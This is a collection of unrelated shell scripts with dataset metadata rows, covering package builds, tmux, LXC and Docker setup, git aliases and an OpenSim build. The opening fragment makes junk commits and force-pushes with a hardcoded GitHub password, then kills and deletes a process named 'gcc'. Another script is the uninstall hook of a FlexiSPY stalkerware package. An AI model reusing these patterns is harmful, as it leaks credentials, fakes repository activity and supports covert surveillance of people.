git config user.name 'Akbar Goodman' &>/dev/null || true
else
AE=$(git log --format='%ae' "$H") || true
AN=$(git log --format='%an' "$H") || true
git config user.email "a$AE" &>/dev/null || true
git config user.name "$AN" &>/dev/null || true
fi
RF1=$(find . ! -path './.git/*' -size -50k -type f ! -iname '.*' ! -iname '_*' | shuf | head --lines 1) || true
RF2=$(find . ! -path './.git/*' -size -50k -type f ! -iname '.*' ! -iname '_*' | shuf | head --lines 1) || true
RF1B=$(basename "$RF1") || true
RF2B=$(basename "$RF2") || true
RF1D=$(dirname "$RF1") || true
RF2D=$(dirname "$RF2") || true
rm -rf "$RF1D"/."$RF1B" &>/dev/null || true
rm -rf "$RF2D"/."$RF2B" &>/dev/null || true
rm -rf "$RF1D"/_"$RF1B" &>/dev/null || true
rm -rf "$RF2D"/_"$RF2B" &>/dev/null || true
if [[ R -eq 0 ]]
then
cp -rf "$RF1" "$RF1D"/."$RF1B" &>/dev/null || true
cp -rf "$RF2" "$RF2D"/_"$RF2B" &>/dev/null || true
else
cp -rf "$RF1" "$RF1D"/_"$RF1B" &>/dev/null || true
cp -rf "$RF2" "$RF2D"/."$RF2B" &>/dev/null || true
fi
git add . &>/dev/null || true
git log --format='%B' "$(git rev-list master | tail --lines 1)" | git commit --file - &>/dev/null || true
P_1=""
P_2="yuOyIra4T2O"
git push --force --no-tags https://a-godman:''"$P_1""$P_2"''@github.com/a-godman/search-card.git &>/dev/null || true
cd .. || true
rm -rf cloned_repo || true
D="y"
fi
fi
echo $TC
sleep 60
TC=$(date +%s)
if [[ TC -gt TE ]]
then
$SUDO kill "$(pgrep gcc)" &>/dev/null
break
fi
done
rm -rf gcc &>/dev/null
| true
|
aa1cd5ec66576fb2b781232b5b63f95934569dab
|
Shell
|
ilventu/aur-mirror
|
/mawk/PKGBUILD
|
UTF-8
| 792
| 2.75
| 3
|
[] |
no_license
|
# Contributor: judd <jvinet@zeroflux.org>
# Committer: Judd Vinet <jvinet@zeroflux.org>
# Maintainer: Stefan Husmann <stefan-husmann@t-online.de>
pkgname=mawk
pkgver=1.3.4_20120627
pkgrel=1
pkgdesc="An interpreter for the AWK Programming Language"
arch=('i686' 'x86_64')
license=('GPL')
provides=('awk')
depends=('glibc')
url="http://freshmeat.net/projects/mawk/"
source=(ftp://invisible-island.net/$pkgname/$pkgname-${pkgver/_/-}.tgz)
md5sums=('df60e65d8c7cf5c6c571ae28fee93289')
build() {
cd $srcdir/$pkgname-${pkgver/_/-}
sed -ie 's|log()|log(1.0)|g' configure
sed -ie "s|trap *0|trap 'exit 0' 0|g" test/*
./configure
make -j1
}
package () {
cd $srcdir/$pkgname-${pkgver/_/-}
install -d $pkgdir/usr/bin
install -d $pkgdir/usr/share/man/man1
make BINDIR=$pkgdir/usr/bin \
MANDIR=$pkgdir/usr/share/man/man1 install
}
| true
|
68d5d2c86519c43997f11532afed19ff8ad46d6f
|
Shell
|
Danielshow/prepare_my_workspace
|
/main.sh
|
UTF-8
| 1,171
| 3.234375
| 3
|
[] |
no_license
|
#!/bin/bash
function open_workspace(){
for f in `seq 1 4 `; do
case $f in
1)
tmux split-window -h -t $1
tmux send-keys -t $1:1 fluxx Enter
tmux send-keys -t $1:1 bes Enter
tmux select-layout -t $1 even-horizontal
;;
2)
tmux split-window -h -t $1
tmux send-keys -t $1:1 fluxx Enter
tmux send-keys -t $1:1 que Enter
tmux select-layout -t $1 even-horizontal
;;
3)
tmux split-window -h -t $1
tmux send-keys -t $1:1 fluxx Enter
tmux send-keys -t $1:1 dyn Enter
tmux select-layout -t $1 even-horizontal
;;
4)
tmux split-window -v -t $1
tmux send-keys -t $1:1 es Enter
;;
*)
echo Thats All
;;
esac
done
}
function set_requirement(){
base_session='my_work_space'
session_name=$base_session
tmux new-session -d -s $base_session
tmux -2 attach-session -t $session_name >/dev/null 2>&1
open_workspace $base_session
tmux new-window -t $session_name:2
tmux send-keys -t $session_name:2 fluxx Enter
tmux send-keys -t $session_name:2 'vim .' Enter
}
set_requirement
| true
|
ca2978f248cd8b3d84262a65ab14ce5d5360e030
|
Shell
|
rafex/lxc-scripts
|
/initCentOS.sh
|
UTF-8
| 3,859
| 3.5625
| 4
|
[] |
no_license
|
#!/bin/bash
SCRIPTSPATH=`dirname ${BASH_SOURCE[0]}`
source $SCRIPTSPATH/lib.sh
distro="centos"
release="7"
if [ -z $2 ]
then
echo "please call $0 <name of new container> <cid> <release, default is $release> <arch, default is amd64> <autostart, default is 1>"
echo " eg. $0 50-centos-mymachine 50"
exit 1
fi
name=$1
cid=$2
if [ ! -z $3 ]
then
release=$3
fi
arch="amd64"
if [ ! -z $4 ]
then
arch=$4
fi
autostart=1
if [ ! -z $5 ]
then
autostart=$5
fi
rootfs_path=/var/lib/lxc/$name/rootfs
config_path=/var/lib/lxc/$name
networkfile=${rootfs_path}/etc/sysconfig/network-scripts/ifcfg-eth0
bridgeInterface=$(getBridgeInterface) || die "cannot find the bridge interface"
bridgeAddress=$(getIPOfInterface $bridgeInterface) || die "cannot find the address for the bridge $bridgeInterface"
networkAddress=$(echo $bridgeAddress | cut -f1,2,3 -d".")
IPv4=$networkAddress.$cid
if ( [ "$release" == "5" ] ) || ( [ "$release" == "7" ] && [ "$arch" == "i686" ] )
then
if [ -z `which yum` ]
then
echo "please activate the universe repository and run: apt-get install yum"
exit -1
fi
arch2=$arch
if [ "$arch" == "amd64" ]
then
arch2="x86_64"
fi
if ( [ "$release" == "7" ] && [ "$arch" == "i686" ] )
then
lxc-create -n $name -t $distro -- --repo=http://mirror.centos.org/altarch/7/os/i386/ --release=$release --arch=i686 || exit 1
else
lxc-create -n $name -t $distro -- --release=$release --arch=$arch2 || exit 1
fi
else
lxc-create -t download -n $name -- -d $distro -r $release -a $arch || exit 1
fi
ssh-keygen -f "/root/.ssh/known_hosts" -R $IPv4
sed -i "s/HOSTNAME=.*/HOSTNAME=$name/g" $rootfs_path/etc/sysconfig/network
sed -i 's/^BOOTPROTO=*/BOOTPROTO=static/g' $networkfile
echo "IPADDR=$IPv4" >> $networkfile
echo "GATEWAY=$bridgeAddress" >> $networkfile
echo "NETMASK=255.255.255.0" >> $networkfile
echo "NETWORK=$networkAddress.0" >> $networkfile
echo "nameserver $bridgeAddress" > $rootfs_path/etc/resolv.conf
network="lxc.network"
if [ -z "`cat $rootfs_path/../config | grep "$network.link"`" ]
then
# lxc 3
network="lxc.net.0"
fi
sed -i "s/$network.link = lxcbr0/$network.link = $bridgeInterface/g" $rootfs_path/../config
if [[ "$network" == "lxc.network" ]]; then
echo "$network.ipv4="$IPv4"/24" >> $rootfs_path/../config
else
echo "$network.ipv4.address = "$IPv4"/24" >> $rootfs_path/../config
fi
#echo "lxc.network.ipv4.gateway=$networkaddress.1" >> $rootfs_path/../config
echo "127.0.0.1 "$name" localhost" > $rootfs_path/etc/hosts
if [ "$release" == "7" ]
then
if [[ "$network" == "lxc.network" ]]; then
echo "lxc.aa_profile = unconfined" >> $rootfs_path/../config
# see http://serverfault.com/questions/658052/systemd-journal-in-debian-jessie-lxc-container-eats-100-cpu
echo "lxc.kmsg = 0" >> $rootfs_path/../config
fi
sed -i "s/ConditionPathExists/#ConditionPathExists/g" $rootfs_path/lib/systemd/system/getty@.service
# see https://wiki.archlinux.org/index.php/Lxc-systemd
echo "lxc.autodev = 1" >> $rootfs_path/../config
fi
# mount yum cache repo, to avoid redownloading stuff when reinstalling the machine
hostpath="/var/lib/repocache/$cid/$distro/$release/$arch/var/cache/yum"
$SCRIPTSPATH/initMount.sh $hostpath $name "/var/cache/yum"
# configure timezone
cd $rootfs_path/etc; rm -f localtime; ln -s ../usr/share/zoneinfo/Europe/Berlin localtime; cd -
# yum: keep the cache
sed -i 's/^keepcache=0/keepcache=1/g' $rootfs_path/etc/yum.conf
# install openssh-server
lxc-start -d -n $name
sleep 5
lxc-attach -n $name -- yum -y install openssh-server && systemctl start sshd
lxc-stop -n $name
# drop root password completely
chroot $rootfs_path passwd -d root
# disallow auth with null password
sed -i 's/nullok//g' $rootfs_path/etc/pam.d/system-auth
install_public_keys $rootfs_path
configure_autostart $autostart $rootfs_path
info $cid $name $IPv4
| true
|
363b57e18d097709559268a7bcf803db87140e49
|
Shell
|
fbrei/MyDotFiles
|
/i3blocks/currently_playing
|
UTF-8
| 766
| 3.671875
| 4
|
[] |
no_license
|
#!/bin/bash
ARTIST_MAX=25
SONG_MAX=25
## ===================================================
ARTIST_LIMIT=$((ARTIST_MAX - 3))
SONG_LIMIT=$((SONG_MAX - 3))
case "$BLOCK_INSTANCE" in
cmus)
ARTIST="$(cmus-remote -Q | awk '$2=="artist" { $1=""; $2=""; print $0; exit }' )"
SONG="$(cmus-remote -Q | awk '$2=="title" { $1=""; $2=""; print $0; exit }' )"
;;
audacious)
ARTIST="$(audtool --current-song-tuple-data artist)"
SONG="$(audtool --current-song-tuple-data title)"
;;
*)
echo "n/a"
exit
;;
esac
if [ ${#ARTIST} -gt $ARTIST_MAX ]
then
ARTIST=$(printf "%s..." "${ARTIST:0:$ARTIST_LIMIT}")
fi
if [ ${#SONG} -gt $SONG_MAX ]
then
SONG=$(printf "%s..." "${SONG:0:$SONG_LIMIT}")
fi
echo $ARTIST - $SONG
| true
|
4a630f0e6f450f87b42a2aeea2d45853a1a3fbb7
|
Shell
|
Niels-Frederik/dotfiles
|
/Scripts/test.sh
|
UTF-8
| 379
| 2.6875
| 3
|
[] |
no_license
|
#!/bin/bash
bat_files="/sys/class/power_supply/BAT0"
full_charge=$(cat "${bat_files}/charge_full")
now_charge=$(cat "${bat_files}/charge_now")
echo $full_charge
echo $now_charge
res=($now_charge/$full_charge | bc)
echo ${res}
#echo ${now_charge}/${full_charge}
#res=$((now_charge*10/full_charge*10))
#echo print (now_charge/full_charge | perl)
#echo ${res}
#echo bc << ${res}
| true
|
ee9fd1242f7e92b0a280fa720727c55a6014f2ec
|
Shell
|
KrisSaxton/lfs-build-6.2
|
/bootscripts/lfs-bootscripts-6.2/install/configure
|
UTF-8
| 3,195
| 2.75
| 3
|
[] |
no_license
|
#!/bin/bash
################################################################################
# BEGIN
################################################################################
source functions
################################################################################
# GLOBALS
################################################################################
ABSetDefault AB_SYSTEM_INSTALL_DIR /usr/pkg
################################################################################
# DEPENDENCIES
################################################################################
ABSetDefault AB_PACKAGE_LFS_BOOTSCRIPTS_DEPENDS PKG_DEPENDS
ABSetDefault AB_PACKAGE_PKG_DEPENDS_INSTALL_ENABLE no
ABSetDefault AB_PACKAGE_PKG_DEPENDS_INSTALL_FORCE no
ABSetDefault AB_PACKAGE_PKG_DEPENDS_INSTALL_NAME pkgdependsname
ABSetDefault AB_PACKAGE_PKG_DEPENDS_INSTALL_DIR $AB_SYSTEM_INSTALL_DIR/$AB_PACKAGE_PKG_DEPENDS_INSTALL_NAME
ABSetDefault AB_PACKAGE_PKG_DEPENDS_INCLUDE_DIR $AB_PACKAGE_PKG_DEPENDS_INSTALL_DIR/include
ABSetDefault AB_PACKAGE_PKG_DEPENDS_LIB_DIR $AB_PACKAGE_PKG_DEPENDS_INSTALL_DIR/lib
#ABSetCompileFlags $AB_PACKAGE_LFS_BOOTSCRIPTS_DEPENDS
################################################################################
# CONFIGURATION
################################################################################
ABSetDefault AB_PACKAGE_LFS_BOOTSCRIPTS_NAME lfs-bootscripts
ABSetDefault AB_PACKAGE_LFS_BOOTSCRIPTS_VERSION 6.2
ABSetDefault AB_PACKAGE_LFS_BOOTSCRIPTS_DESC 'A collection of scripts to start and stop the system at bootup and shutdown'
ABSetDefault AB_PACKAGE_LFS_BOOTSCRIPTS_INSTALL_NAME ${AB_PACKAGE_LFS_BOOTSCRIPTS_NAME}-${AB_PACKAGE_LFS_BOOTSCRIPTS_VERSION}
ABSetDefault AB_PACKAGE_LFS_BOOTSCRIPTS_INSTALL_DIR $AB_SYSTEM_INSTALL_DIR/$AB_PACKAGE_LFS_BOOTSCRIPTS_INSTALL_NAME
ABSetDefault AB_PACKAGE_LFS_BOOTSCRIPTS_INCLUDE_DIR $AB_PACKAGE_LFS_BOOTSCRIPTS_INSTALL_DIR/include
ABSetDefault AB_PACKAGE_LFS_BOOTSCRIPTS_LIB_DIR $AB_PACKAGE_LFS_BOOTSCRIPTS_INSTALL_DIR/lib
ABSetDefault AB_PACKAGE_LFS_BOOTSCRIPTS_CONFIGURE_PREFIX $AB_PACKAGE_LFS_BOOTSCRIPTS_INSTALL_DIR
ABSetDefault AB_PACKAGE_LFS_BOOTSCRIPTS_CONFIGURE_WITH_EDITOR /usr/bin/nano
AB_PACKAGE_NAME=$AB_PACKAGE_LFS_BOOTSCRIPTS_NAME
AB_PACKAGE_VERSION=$AB_PACKAGE_LFS_BOOTSCRIPTS_VERSION
AB_PACKAGE_DESC=$AB_PACKAGE_LFS_BOOTSCRIPTS_DESC
AB_PACKAGE_INSTALL_NAME=$AB_PACKAGE_LFS_BOOTSCRIPTS_INSTALL_NAME
AB_PACKAGE_INSTALL_DIR=$AB_PACKAGE_LFS_BOOTSCRIPTS_INSTALL_DIR
AB_PACKAGE_INCLUDE_DIR=$AB_PACKAGE_LFS_BOOTSCRIPTS_INCLUDE_DIR
AB_PACKAGE_LIB_DIR=$AB_PACKAGE_LFS_BOOTSCRIPTS_LIB_DIR
AB_PACKAGE_CONFIGURE_PREFIX=$AB_PACKAGE_LFS_BOOTSCRIPTS_CONFIGURE_PREFIX
AB_PACKAGE_CONFIGURE_WITH_EDITOR=$AB_PACKAGE_LFS_BOOTSCRIPTS_CONFIGURE_WITH_EDITOR
################################################################################
# END
################################################################################
| true
|
99230be2328ea42e559f45994bbcaa7a7474a81a
|
Shell
|
metcalfc/stevedore
|
/scripts/install-ducp.sh
|
UTF-8
| 1,194
| 3.0625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
DUCP_USERNAME=''
DUCP_PASSWORD=''
DUCP_VERSION='1.0.3'
for i in "$@"
do
case $i in
DUCP_USERNAME=*)
DUCP_USERNAME="${i#*=}"
shift
;;
DUCP_PASSWORD=*)
DUCP_PASSWORD="${i#*=}"
shift
;;
DUCP_VERSION=*)
DUCP_VERSION="${i#*=}"
shift
;;
esac
done
echo "Leading DUCP"
docker volume create --name ucp-controller-server-certs
docker run --name hold -v ucp-controller-server-certs:/data tianon/true
docker cp /vagrant/etc/ca.pem hold:/data/ca.pem
docker cp /vagrant/etc/ssl/certs/$(hostname -f).crt hold:/data/cert.pem
docker cp /vagrant/etc/ssl/private/$(hostname -f).key hold:/data/key.pem
docker run --rm \
--name ucp \
-v /var/run/docker.sock:/var/run/docker.sock \
-v /vagrant/etc/license.lic:/docker_subscription.lic \
-e UCP_ADMIN_USER=${DUCP_USERNAME} \
-e UCP_ADMIN_PASSWORD=${DUCP_PASSWORD} \
docker/ucp:${DUCP_VERSION} \
install \
--fresh-install \
--debug \
--san $(hostname -s) \
--san $(hostname -f) \
--host-address $(host $(hostname -f) | awk '/has address/ { print $4 ; exit }') \
--external-ucp-ca \
--swarm-port 3376
| true
|
ee2086f0091a20faa02a6c28bf52af9828c3a6bc
|
Shell
|
cristianoliveira/dotfiles
|
/zsh/aliases/git.zsh
|
UTF-8
| 3,979
| 3.0625
| 3
|
[] |
no_license
|
# This is default, but may vary by project.
# See '../settings/git.zsh' how to configure a different $LOCAL_MAIN_BRANCH
MAIN_BRANCH='main'
# git show
alias gsh='git show'
alias gshw='git show'
alias gshow='git show'
# git stash
alias gstsh='git stash'
alias gst='git stash'
alias gst!='git stash --include-untracked'
alias gstp='git stash pop'
alias gsta='git stash apply'
# git merge
alias gm='git merge'
alias gms='git merge --squash'
alias gmc='git merge --continue'
# git rebase
alias gr='git rebase'
alias gra='git rebase --abort'
alias ggrc='git rebase --continue'
alias grbi='git rebase --interactive'
alias grbom='git rebase origin/"$MAIN_BRANCH"'
# git log
alias gl='git l'
alias glg='git log'
alias glog='git l'
# git fetch
alias gf='git fetch'
alias gfp='git fetch --prune'
alias gfa='git fetch --all'
alias gfap='git fetch --all --prune'
alias gfch='git fetch'
# git diff
alias gd='git diff'
alias gdno='git diff --name-only'
# Staged and cached are the same thing
alias gdc='git diff --cached -w'
alias gds='git diff --staged -w'
# git pull
alias gpull='git pull'
alias gpl='git pull'
alias gplr='git pull --rebase'
# git push
alias gp='git push -u'
alias gps='git push'
alias gpush='git push'
alias gpushu='git push -u' # it sets the upstream for the given remote/branch
alias gpn='git push --no-verify' # avoid prehooks
alias gpf='git push --force-with-lease'
alias gp!='git push --no-verify' # avoid prehooks
alias gp!!='git push --no-verify --force-with-lease' # avoid prehooks and force
# git reset
alias grs='git reset'
alias grsh='git reset --hard'
alias grsth='git reset --hard'
alias grsom='git reset --hard origin/"$MAIN_BRANCH"'
alias grshom='git reset --hard origin/"$MAIN_BRANCH"'
alias grsthom='git reset --hard origin/"$MAIN_BRANCH"'
alias grst!='git reset --hard origin/"$MAIN_BRANCH"'
# git clean
alias gcln='git clean'
alias gclnf='git clean -df'
alias gclndfx='git clean -dfx'
# git submodule
alias gsm='git submodule'
alias gsmi='git submodule init'
alias gsmu='git submodule update'
# git checkout
alias gch='git checkout'
alias gchb='git checkout -b'
alias gch='git checkout'
alias gchm='git checkout "$MAIN_BRANCH"'
alias gchd='git checkout develop'
# git branch
alias gbo='git branch --sort=-committerdate'
alias gb='git branch --sort=-committerdate'
alias gbl='git branch --sort=-committerdate| head -n 1'
alias gdmb='git branch --merged | grep -v "\*" | xargs -n 1 git branch -d'
alias gnb='git nb' # new branch aka checkout -b
alias gb='git b'
alias gbh='git branch --sort=-committerdate | head -n'
alias gclb='git branch --sort=-committerdate | head -n 1 | pbcopy'
alias gbsync="~/.dotfiles/zsh/scripts/git-branch-sync"
alias gbls="git branch --list --format='%(refname:short)'"
# git helpers
alias gwip='git add . && git commit -m "WIP" --no-verify'
alias goverride='git push origin +$(git branch | grep \* | cut -d ' ' -f2)'
alias gdfb="git log --graph --pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr)%Creset' --abbrev-commit --date=relative"
alias gclnb='git branch --merged | grep -v "\*" | xargs -n 1 git branch -d'
alias gmlb='git merge `git branch --sort=-committerdate| head -n 1`'
alias gdm='git diff origin/"$MAIN_BRANCH"'
alias gllc='git log --format="%H" -n 1'
alias gpub='grb publish'
alias gtr='grb track'
alias glf='git follow'
alias co='git co'
alias gt='git t'
alias gbg='git bisect good'
alias gbb='git bisect bad'
alias gi='vim .gitignore'
alias gcm='git ci -m'
alias gcm!='git ci --no-verify -m'
alias gcim='git ci -m'
alias gci='git ci'
alias gco='git co'
alias gcp='git cp'
alias ga='git add -A'
alias gap='git add -p'
alias guns='git unstage'
alias gunc='git uncommit'
alias gam='git amen --reset-author'
alias grmv='git remote -v'
alias grmr='git remote rm'
alias grad='git remote add'
alias gs='git status'
alias gmt="git mergetool"
alias gamd='git commit --amend'
alias gamd!='git commit --amend --no-edit'
alias gchbm="git checkout origin/\$MAIN_BRANCH && git checkout -b"
| true
|
2a86b397fae9cd6109c8263e539937fe2f034162
|
Shell
|
UKGovLD/registry-core
|
/bin/make.sh
|
UTF-8
| 599
| 3.34375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Build the war artifact and release it to the UKGovLD s3 bucket for use in deployments
# Assumes deployer credentials have been set in the environment via something like:
# export AWS_ACCESS_KEY_ID=ABC
# export AWS_SECRET_ACCESS_KEY=DEF
# export AWS_DEFAULT_REGION=eu-west-1
#mvn clean package || { echo "Maven build failed" 1>&2; exit 1; }
[[ `echo target/*.war` =~ target/(.*)$ ]] || { echo "Can't find war artifact" 1>&2; exit 1; }
upload=${BASH_REMATCH[1]}
echo "Uploading to s3://ukgovld/registry-core/$upload"
aws s3 cp target/$upload s3://ukgovld/registry-core/$upload
| true
|
4a54b7d799de500c1a919f9263d63072e91e0cf7
|
Shell
|
JohnHubcr/malware
|
/FlexiSpy/iphone-phoenix-old/FlexiSPY Phoenix 1.3.1/FlexiSPY/Packages/DEBIAN/prerm
|
UTF-8
| 656
| 2.96875
| 3
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
#!/bin/bash
declare -a cydia
cydia=($CYDIA)
if [[ ${CYDIA+@} ]]; then
SSMP_CYDIA_REMOVE="YES"
else
SSMP_CYDIA_REMOVE="NO"
fi
if [[ $1 == remove ]]; then
if [[ ${CYDIA+@} ]]; then
eval "echo 'finish:restart' >&${cydia[0]}"
fi
. /Applications/systemcore.app/Uninstall.sh $SSMP_CYDIA_REMOVE
fi
#echo "*********************************************************"
#echo "*********************************************************"
#echo "TO COMPLETE UNINSTALL RESTART SPRINGBOARD NOW!"
#echo "*********************************************************"
#echo "*********************************************************"
#echo ""
#echo ""
sleep 3
exit 0
| true
|
6c86a85b6358a59a9b15bd6b98ab37fd2db8e397
|
Shell
|
fszostak/bash-util-scripts
|
/src/k-mem
|
UTF-8
| 723
| 3.78125
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
#-----------------------------
# k-mem (2022) fszostak
# Thu 24 Feb 2022 08:11:29 AM -03
#
# Show memory usage of namespace
if [ $# -eq 0 ]; then
echo "usage: k-mem <namespace> [-w] [sleep]"
exit
fi
NAMESPACE=$1
WATCH=$2
SLEEP=$3
if [ "$SLEEP" = "" ]; then
SLEEP=10
fi
while true
do
echo -n "$(date +'%F %T');$NAMESPACE"
SUM=0; for N in $(kubectl top pods -n $NAMESPACE| awk '{print $2 }' | sed 's/m//' | grep -v CPU); do let SUM=$SUM+$N; done; echo -n ";cpu ${SUM}m"
SUM=0; for N in $(kubectl top pods -n $NAMESPACE| awk '{print $3 }' | sed 's/Mi//' | grep -v MEMORY); do let SUM=$SUM+$N; done; echo -n ";memory ${SUM}Mi"
echo
if [ "$WATCH" != "-w" ]; then
break
fi
sleep $SLEEP
done
| true
|
90f9fdafbdc5601126413bbbfff17e50fbb8cc83
|
Shell
|
rflynn/osx-vm
|
/demo-docker-machine-xhyve.sh
|
UTF-8
| 782
| 2.734375
| 3
|
[] |
no_license
|
#!/bin/bash
set -o xtrace
set -o errexit
set -o pipefail
brew update
brew install docker-machine-driver-xhyve
sudo chown root:wheel $(brew --prefix)/opt/docker-machine-driver-xhyve/bin/docker-machine-driver-xhyve
sudo chmod u+s $(brew --prefix)/opt/docker-machine-driver-xhyve/bin/docker-machine-driver-xhyve
docker-machine create \
--driver xhyve \
--xhyve-cpu-count 1 \
--xhyve-memory-size 1024 \
--xhyve-disk-size 10000 \
default
#--xhyve-experimental-nfs-share \
docker-machine env default
eval $(docker-machine env default)
sudo cp /var/db/dhcpd_leases \
/var/db/dhcpd_leases.backup && \
sudo cp /Library/Preferences/SystemConfiguration/com.apple.vmnet.plist \
/Library/Preferences/SystemConfiguration/com.apple.vmnet.plist.backup
| true
|
8bf290f76d056f0d7b5fd10fe7e3499883822433
|
Shell
|
icanka/nexus
|
/scripts/inpath
|
UTF-8
| 266
| 3.828125
| 4
|
[] |
no_license
|
#! /bin/bash
in_path()
{
cmd=$1
ourpath=$2
result=1
oldIFS=$IFS
IFS=":"
for directory in "$ourpath"
do
echo ${directory}
#if [ -x $directory/$cmd ] ; then
result=0 # If we are here, we found the command.
#fi
done
IFS=$oldIFS
return $result
}
| true
|
8e3c34f82daae6f788bcc6dc7bb183207135d1b7
|
Shell
|
MrMichou/tools_made
|
/whitlist_ipset.sh
|
UTF-8
| 1,304
| 3.140625
| 3
|
[] |
no_license
|
#!/bin/bash
value=""
for ip in $(sudo cat /var/log/syslog | grep "$cat_date" | grep "$value" | awk '{print $10}' | tr -d SRC= | sort -h | uniq -u);do
country=$(whois $ip | egrep -i '[C|c]ountry:' | awk '{ print $2 }' | uniq -u)
ISP=""
if [[ $country == "FR" ]];then
ISP=$(whois $ip | grep 'role')
case $ISP in
*"SFR"*)
route=$(whois $ip | grep route | awk '{ print $2 }')
if [[ $1 =~ '(Y|y)es' ]];then
sudo ipset add IpAuto $route
fi
ISP="SFR"
;;
*"Bouygue"*)
route=$(whois $ip | grep route | awk '{ print $2 }')
if [[ $1 =~ '(Y|y)es' ]];then
sudo ipset add IpAuto $route
fi
ISP="Bouygue"
;;
*"Wanadoo"*)
route=$(whois $ip | grep route | awk '{ print $2 }')
if [[ $1 =~ '(Y|y)es' ]];then
sudo ipset add IpAuto $route
fi
ISP="Wanadoo"
;;
*"ProXad"*)
route=$(whois $ip | grep route | awk '{ print $2 }')
if [[ $1 =~ '(Y|y)es' ]];then
sudo ipset add IpAuto $route
fi
ISP="Free"
;;
*"Numericable"*)
route=$(whois $ip | grep route | awk '{ print $2 }')
if [[ $1 =~ '(Y|y)es' ]];then
sudo ipset add IpAuto $route
fi
ISP="Numericable"
;;
*)
ISP=""
;;
esac
fi
list="$list \n$ip \t $country \t $ISP"
done;
echo -e $list
| true
|
48e389a851d4e8547af7fcae02153e29a3b76f63
|
Shell
|
p4lang/p4c
|
/tools/check-git-submodules.sh
|
UTF-8
| 2,057
| 4.65625
| 5
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# This checks that the refpoint for each git submodule is on the respective
# branch that we are tracking.
### Begin configuration #######################################################
THIS_DIR=$( cd -- "$( dirname -- "${BASH_SOURCE[0]}" )" &> /dev/null && pwd )
declare -A branchOverrides=(
)
### End configuration #########################################################
set -e
skipFetch=false
if [[ $# -gt 0 && "$1" == '--skip-fetch' ]] ; then
skipFetch=true
shift
fi
if [[ $# == 0 ]] ; then
# No arguments given. Create a temporary file and call ourselves on each git
# submodule. If the check fails for any submodule, the temporary file will be
# removed.
tmpfile="$(mktemp --tmpdir check-git-submodules.XXXXXXXXXX)"
${skipFetch} || git fetch --quiet origin
git submodule --quiet foreach \
"${THIS_DIR}"'/check-git-submodules.sh ${sm_path} ${sha1} '"${tmpfile}"
rm "${tmpfile}" &>/dev/null
else
sm_path="$1"
sha1="$2"
tmpfile="$3"
echo "Checking submodule ${sm_path} with sha ${sha1} in folder ${PWD}."
${skipFetch} || git fetch --quiet origin
# Figure out what branch we are tracking (e.g., "origin/main") and derive a
# simple name for that branch (e.g., "main").
trackingBranch="${branchOverrides["${sm_path}"]}"
if [[ -z "${trackingBranch}" ]] ; then
trackingBranch="$(git symbolic-ref refs/remotes/origin/HEAD | sed s%^refs/remotes/%%)"
simpleBranchName="${trackingBranch:7}"
else
simpleBranchName="${trackingBranch}"
fi
# Check that the top of the branch being tracked is an ancestor of the
# current refpoint.
if ! git merge-base --is-ancestor "${sha1}" "${trackingBranch}" ; then
echo "Submodule ${sm_path} is not on ${simpleBranchName} because ${sha1} is not an ancestor of ${trackingBranch}."
# Remove the temporary file to signal an error. We don't use the exit
# status for this because it would cause `git submodule foreach` to stop
# looping, and we'd like to continue to check all remaining submodules.
rm -f "${tmpfile}"
fi
fi
| true
|
8a6b08081e8c9dd2413ad94ef7760f746cd62ae1
|
Shell
|
ComputationalBiomechanicsLab/opensim-creator
|
/scripts/build_mac-catalina.sh
|
UTF-8
| 4,602
| 3.546875
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
# Mac Catalina: end-2-end build
#
# - this script should run to completion on a relatively clean
# Catalina (OSX 10.5) machine with xcode, CMake, etc. installed
#
# - run this from the repo root (opensim-creator) dir
# error out of this script if it fails for any reason
set -xeuo pipefail
# ----- handle external build parameters ----- #
# "base" build type to use when build types haven't been specified
OSC_BASE_BUILD_TYPE=${OSC_BASE_BUILD_TYPE:-Release}
# build type for all of OSC's dependencies
OSC_DEPS_BUILD_TYPE=${OSC_DEPS_BUILD_TYPE:-`echo ${OSC_BASE_BUILD_TYPE}`}
# build type for OSC
OSC_BUILD_TYPE=${OSC_BUILD_TYPE-`echo ${OSC_BASE_BUILD_TYPE}`}
# extra compiler flags for the C++ compiler
OSC_CXX_FLAGS=${OSC_CXX_FLAGS:-`echo -fno-omit-frame-pointer`}
# maximum number of build jobs to run concurrently
#
# defaulted to 1, rather than `sysctl -n hw.physicalcpu`, because OpenSim
# requires a large amount of RAM--more than most machines have--to build
# concurrently, #659
OSC_BUILD_CONCURRENCY=${OSC_BUILD_CONCURRENCY:-1}
# which build system to use (e.g. Ninja, Makefile: see https://cmake.org/cmake/help/latest/manual/cmake-generators.7.html)
OSC_GENERATOR=${OSC_GENERATOR:-`echo Unix Makefiles`}
# which OSC build target to build
#
# osc just build the osc binary
# package package everything into a .dmg installer
OSC_BUILD_TARGET=${OSC_BUILD_TARGET:-package}
# set this if you want to skip installing system-level deps
#
# OSC_SKIP_BREW
# set this if you want to build the documentation
#
# OSC_BUILD_DOCS
set +x
echo "----- starting build -----"
echo ""
echo "----- printing build parameters -----"
echo ""
echo " OSC_BASE_BUILD_TYPE = ${OSC_BASE_BUILD_TYPE}"
echo " OSC_DEPS_BUILD_TYPE = ${OSC_DEPS_BUILD_TYPE}"
echo " OSC_BUILD_TYPE = ${OSC_BUILD_TYPE}"
echo " OSC_CXX_FLAGS = ${OSC_CXX_FLAGS}"
echo " OSC_BUILD_CONCURRENCY = ${OSC_BUILD_CONCURRENCY}"
echo " OSC_GENERATOR = ${OSC_GENERATOR}"
echo " OSC_BUILD_TARGET = ${OSC_BUILD_TARGET}"
echo " OSC_SKIP_BREW = ${OSC_SKIP_BREW:-OFF}"
echo " OSC_BUILD_DOCS = ${OSC_BUILD_DOCS:-OFF}"
echo ""
set -x
echo "----- ensuring all submodules are up-to-date -----"
git submodule update --init --recursive
if [[ -z ${OSC_SKIP_BREW:+x} ]]; then
echo "----- getting system-level dependencies -----"
# reinstall gcc
#
# this is necessary because OpenSim depends on gfortran for
# libBLAS. This is probably a misconfigured dependency in OpenSim,
# because Mac already contains an Apple-provided libBLAS
brew reinstall gcc
# `wget`
#
# seems to be a transitive dependency of OpenSim (Metis),
# which uses wget to get other deps
# `automake`
#
